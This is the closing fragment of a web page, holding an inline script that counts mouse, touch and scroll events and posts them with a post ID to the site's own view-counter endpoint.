<script>let mouseMoveCount = 0, scrollCount = 0, debounceTimer, mouseMoveDebounceTimer, debounceDelay = 8;function incrementMouseMove() {clearTimeout(mouseMoveDebounceTimer);mouseMoveDebounceTimer = setTimeout(function () {mouseMoveCount++;}, debounceDelay);}document.addEventListener('mousemove', incrementMouseMove);document.addEventListener('touchmove', incrementMouseMove);window.addEventListener('scroll', function () {clearTimeout(debounceTimer);debounceTimer = setTimeout(function () {scrollCount++;}, debounceDelay);});setTimeout(function () {let userBehaviorData = {postId: '9185', mouseMoveCount: mouseMoveCount, scrollCount: scrollCount};$.ajax({type: 'POST', url: VrConfig.baseURL + '/Ajax/incrementPostViews', data: setAjaxData(userBehaviorData)});}, 0);</script>
</body>
</html>